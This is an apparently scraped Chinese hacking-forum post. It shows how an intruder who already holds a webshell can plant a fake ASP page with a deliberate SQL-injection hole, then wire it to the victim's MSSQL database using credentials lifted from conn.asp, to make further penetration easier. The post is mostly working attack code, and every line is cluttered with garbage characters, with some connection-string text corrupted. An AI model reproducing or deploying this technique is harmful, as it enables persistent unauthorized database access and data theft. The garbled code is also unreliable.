自己构造注入点方便入侵& {1 j) A. J. C
+ E( q2 B% s3 R$ U今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息: ~0 j+ h% Y( U8 z
4 C, z2 {5 \" z4 T& Q! L7 p" K
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!& p$ G7 q* c5 [" ?5 c+ [
2 [' X) X; V, L, V首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
; z* @2 y A* t3 w
4 q. q5 L3 U! E* }密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表0 [, |5 j3 T+ k
& h0 e- I7 c8 g* c4 a# B, Y5 H* t
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
6 P0 q' y q, G
; a. i8 q2 p' D: F% q; @程序代码7 G- O% m: I- J3 {2 p+ r
<!--#include file="xx.asp"-->
7 {3 H2 t- S3 P2 b9 g& T9 I<%
2 G7 s1 K1 v, N6 \set rs=server.createobject("ADODB.recordset")
+ i, [4 @) C( x8 y, N$ D% d2 \9 T# xid = request("id")
' m, E3 n" Y9 F& TstrSQL = "select * from admin where id=" & id
; l! i# _8 s# K% |& m8 i( nrs.open strSQL,conn,1,3# T* @' F. ?) r: Y/ y9 b2 k
rs.close
3 n( m3 d( x' E& {5 ^2 ], i# G5 L%>
- M E! z1 Z4 R4 e( Q4 [3 O* v' w& }, q2 G* K/ |$ O4 c
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
' w- P' c- Q' T$ t
6 w0 p1 p, `$ x/ O, ? F你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
, X; X! H* M' s6 G$ P2 y# ]) z4 {* T/ S8 |0 l4 R
然后就要构造一个连接数据库的文件了,代码如下:7 N9 m! n- N* N- J" {: `: z
程序代码
: i/ u* @! o2 f8 E, g6 E/ `1 ?<%
% M1 K" ~9 W+ ]5 L. h% ]. I" PstrSQLServerName = "000.000.000.000" '服务器名称或地址5 S* m: V6 w2 J( W( Y" s
strSQLDBUserName = "sqlname" '数据库帐号6 m6 l$ D, T# b/ N" k, Q# c0 @
strSQLDBPassword = "sqlpass" '数据库密码* P* O( A% e# V: s8 d
strSQLDBName = "sqldataname" '数据库名称7 U/ o1 q5 I6 A! V+ R
Set conn = Server.CreateObject("ADODB.Connection")
- y& C+ C. j3 E1 d) sstrCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"9 f5 E' W/ h' C& ~5 j# _
conn.open strCon
- R$ E7 g/ h! f7 S H, T& ?%>) M* p5 v6 e$ x3 ^2 }' h. o. N
4 }+ O+ L& ?) C$ K% F/ p& A
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,8 m- W9 Q6 |# g3 g. i" m
- g, c8 |+ |+ `就这样,正常情况下,就OK了,伪造成功……
2 r: m- `1 h" m3 c+ [( J; s7 w! J( J6 }1 l' x
如果有什么问题可以提出来大家一起探讨解决。 |